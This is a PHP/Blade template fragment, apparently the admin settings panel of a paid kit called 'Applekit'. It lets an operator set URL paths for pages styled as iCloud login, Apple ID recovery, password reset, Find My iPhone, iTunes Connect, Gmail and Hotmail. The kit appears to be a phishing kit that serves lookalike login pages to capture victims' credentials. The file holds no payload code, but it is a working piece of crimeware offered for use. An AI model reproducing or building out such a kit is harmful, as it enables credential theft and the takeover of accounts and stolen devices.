<!--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~-->
<!-- All Copyright (c) 2018. goes to Nemoze.net @MustaphaOthman Applekit developer,                 -->
<!-- Applekit is a paid software not for Commercial activity,                                       -->
<!-- It must using under an valid license any attempt to using it under an hacked license           -->
<!-- or decode version it will be reported                                                          -->
<!-- And we are responsible for that report,                                                        -->
<!-- Support us by paying for our effort :).                                                        -->
<!--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~-->

<div class="form-group col-md-6 col-sm-6 col-xs-12">
    <a class="thumbnail">
        <img src="{{site_url('assets/img/temp/newicloud.png')}}" alt="...">
    </a>
    <label for="nicloudPage">New iCloud Path</label>

    <div class="input-group m-b">
        <div class="input-group-btn">
            <button data-page="{{($get->nicloudPage) ? $get->nicloudPage : 'icloud'}}"
                    tabindex="-1" class="btn btn-white preview-url" type="button"
                    style="padding-right: 3px" data-toggle="tooltip"
                    data-placement="top"
                    title="Perview in a new tab">{{site_url('/')}}</button>
        </div>
        <input type="text" class="form-control" id="nicloudPage" name="nicloudPage"
               value="{{$get->nicloudPage}}"
               placeholder="{{($get->nicloudPage) ? $get->nicloudPage : 'icloud'}}"
               style="padding-left: 3px"></div>
</div>

<div class="form-group col-md-6 col-sm-6 col-xs-12">
    <a class="thumbnail">
        <img src="{{site_url('assets/img/temp/icloud.png')}}" alt="...">
    </a>
    <label for="loginPage">Old iCloud Path</label>
    <div class="input-group m-b">
        <div class="input-group-btn">
            <button data-page="{{($get->loginPage) ? $get->loginPage : 'lcloud'}}"
                    tabindex="-1" class="btn btn-white preview-url" type="button"
                    style="padding-right: 3px" data-toggle="tooltip"
                    data-placement="top"
                    title="Perview in a new tab">{{site_url('/')}}</button>
        </div>
        <input type="text" class="form-control" id="loginPage" name="loginPage"
               value="{{($get->loginPage) ? $get->loginPage : 'lcloud'}}"
               placeholder="For exp icloud, login, dologin, accessfmi, accessicl"
               style="padding-left: 3px"></div>
</div>


<div class="form-group col-md-6 col-sm-6 col-xs-12">
    <a class="thumbnail">
        <img src="{{site_url('assets/img/temp/aid.png')}}" alt="...">
    </a>
    <label for="disablePage"><?php echo $ci->lang->line( 'iforgot_path_message' ); ?></label>
    <div class="input-group m-b">
        <div class="input-group-btn">
            <button data-page="{{($get->disablePage) ? $get->disablePage : 'aid'}}"
                    tabindex="-1" class="btn btn-white preview-url" type="button"
                    style="padding-right: 3px" data-toggle="tooltip"
                    data-placement="top"
                    title="Perview in a new tab">{{site_url('/')}}</button>
        </div>
        <input type="text" class="form-control" id="disablePage" name="disablePage"
               value="{{($get->disablePage) ? $get->disablePage : 'aid'}}"
               placeholder="For exp icloud, login, dologin, accessfmi, accessicl"
               style="padding-left: 3px"></div>
</div>


<div class="form-group col-md-6 col-sm-6 col-xs-12">
    <a class="thumbnail">
        <img src="{{site_url('assets/img/temp/passwd.png')}}" alt="...">
    </a>
    <label for="passPage">Password Reset Path</label>

    <div class="input-group m-b">
        <div class="input-group-btn">
            <button data-page="{{($get->passPage) ? $get->passPage : 'password'}}"
                    tabindex="-1" class="btn btn-white preview-url" type="button"
                    style="padding-right: 3px" data-toggle="tooltip"
                    data-placement="top"
                    title="Perview in a new tab">{{site_url('/')}}</button>
        </div>
        <input type="text" class="form-control" id="passPage" name="passPage"
               value="{{($get->passPage) ? $get->passPage : 'password'}}"
               placeholder="For exp icloud, login, dologin, accessfmi, accessicl"
               style="padding-left: 3px"></div>
</div>
<div class="clearfix"></div>
<!-- /.clearfix -->
<div class="form-group col-md-6 col-sm-6 col-xs-12">
    <a class="thumbnail">
        <img src="{{site_url('assets/img/temp/fmi2018.jpg')}}" alt="...">
    </a>
    <label for="fmiPage">New Find My iPhone Path</label>

    <div class="input-group m-b">
        <div class="input-group-btn">
            <button data-page="{{($get->fmi2018Page) ? $get->fmi2018Page : 'fmi'}}"
                    tabindex="-1" class="btn btn-white preview-url" type="button"
                    style="padding-right: 3px" data-toggle="tooltip"
                    data-placement="top"
                    title="Perview in a new tab">{{site_url('/')}}</button>
        </div>
        <input type="text" class="form-control" id="fmi2018Page" name="fmi2018Page"
               value="{{($get->fmi2018Page) ? $get->fmi2018Page : 'fmi'}}"
               placeholder="For exp icloud, login, dologin, accessfmi, accessicl"
               style="padding-left: 3px"></div>
</div>

<div class="form-group col-md-6 col-sm-6 col-xs-12">
    <a class="thumbnail">
        <img src="{{site_url('assets/img/temp/fmi.png')}}" alt="...">
    </a>
    <label for="fmiPage">Old Find My iPhone Path</label>

    <div class="input-group m-b">
        <div class="input-group-btn">
            <button data-page="{{($get->fmiPage) ? $get->fmiPage : 'fmii'}}"
                    tabindex="-1" class="btn btn-white preview-url" type="button"
                    style="padding-right: 3px" data-toggle="tooltip"
                    data-placement="top"
                    title="Perview in a new tab">{{site_url('/')}}</button>
        </div>
        <input type="text" class="form-control" id="fmiPage" name="fmiPage"
               value="{{($get->fmiPage) ? $get->fmiPage : 'fmii'}}"
               placeholder="For exp icloud, login, dologin, accessfmi, accessicl"
               style="padding-left: 3px"></div>
</div>


<div class="form-group col-md-6 col-sm-6 col-xs-12">
    <a class="thumbnail">
        <img src="{{site_url('assets/img/temp/ffmi.png')}}" alt="...">
    </a>
    <label for="fmi2Page">Find My iPhone v2 "Compass" Path</label>

    <div class="input-group m-b">
        <div class="input-group-btn">
            <button data-page="{{($get->fmi2Page) ? $get->fmi2Page : 'ffmi'}}"
                    tabindex="-1" class="btn btn-white preview-url" type="button"
                    style="padding-right: 3px" data-toggle="tooltip"
                    data-placement="top"
                    title="Perview in a new tab">{{site_url('/')}}</button>
        </div>
        <input type="text" class="form-control" id="fmi2Page" name="fmi2Page"
               value="{{($get->fmi2Page) ? $get->fmi2Page : 'ffmii'}}"
               placeholder="For exp icloud, login, dologin, accessfmi, accessicl"
               style="padding-left: 3px"></div>
</div>


<div class="form-group col-md-6 col-sm-6 col-xs-12">
    <a class="thumbnail">
        <img src="{{site_url('assets/img/temp/map.png')}}" alt="...">
    </a>
    <label for="mapPage">Map Path</label>
    <input type="mapPage" class="form-control" id="mapPage" name="mapPage"
           value="<?php echo $get->mapPage;?>"
           placeholder="For exp icloud, login, dologin, accessfmi, accessicl">
</div>
<div class="form-group col-md-6 col-sm-6 col-xs-12">
    <a class="thumbnail">
        <img src="{{site_url('assets/img/temp/itunes.png')}}" alt="...">
    </a>
    <label for="itunesPage">iTunes Connect Path</label>
    <input type="itunesPage" class="form-control" id="itunesPage" name="itunesPage"
           value="<?php echo $get->itunesPage;?>"
           placeholder="For exp icloud, login, dologin, accessfmi, accessicl">
</div>

<div class="form-group col-md-6 col-sm-6 col-xs-12">
    <a class="thumbnail">
        <img src="{{site_url('assets/img/temp/gmail.jpg')}}" alt="...">
    </a>
    <label for="gmailPage">Gmail Path</label>
    <input type="gmailPage" class="form-control" id="gmailPage" name="gmailPage"
           value="<?php echo $get->gmailPage;?>"
           placeholder="For exp icloud, login, dologin, accessfmi, accessicl">
</div>

<div class="form-group col-md-6 col-sm-6 col-xs-12">
    <a class="thumbnail">
        <img src="{{site_url('assets/img/temp/hotmail.jpg')}}" alt="...">
    </a>
    <label for="hotPage">Hotmail Path</label>
    <input type="hotPage" class="form-control" id="hotPage" name="hotPage"
           value="<?php echo $get->hotPage;?>"
           placeholder="For exp icloud, login, dologin, accessfmi, accessicl">
</div>